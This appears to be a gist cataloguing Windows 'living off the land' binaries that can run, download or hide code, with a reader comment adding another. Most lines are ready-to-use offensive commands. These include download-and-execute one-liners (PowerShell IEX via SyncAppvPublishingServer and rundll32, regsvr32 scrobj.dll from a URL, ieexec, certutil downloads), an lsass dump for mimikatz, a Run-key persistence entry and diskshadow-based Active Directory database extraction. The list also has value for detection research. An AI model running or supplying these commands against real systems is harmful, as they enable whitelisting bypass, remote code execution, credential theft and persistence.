BinariesThatDoesOtherStuff
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe http://www.google.com or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't execute; download only
https://twitter.com/subtee/status/777538038897397761
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dumps lsass to a mimikatz-compatible dump
https://twitter.com/countuponsec/status/910977826853068800
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
https://twitter.com/0rbz_/status/912530504871759872
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
https://twitter.com/0rbz_/status/915330892637331456
runscripthelper.exe
https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
winword /l dllfile.dll
https://twitter.com/subTee/status/884615369511636992
InfDefaultInstall.exe shady.inf
https://twitter.com/KyleHanslovan/status/911997635455852544
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
fsi.exe
https://twitter.com/NickTyrer/status/904273264385589248
AppVLP.exe
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
SQLPS.exe
Powershell host
https://twitter.com/bryon_/status/975835709587075072
Diskshadow.exe
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
print /D:c:\ads\file.exe \\server.domain.com\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
https://www.youtube.com/watch?v=nPBcSP8M7KE
*** Non-MS binaries ***
nvuhda.exe
nvuhda6.exe
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248
SynTPEnh.exe /SHELLEXEC somebinary.exe - https://twitter.com/egre55/status/1052907871749459968?s=09
fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f321ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt"
https://twitter.com/enigma0x3/status/923311244358094848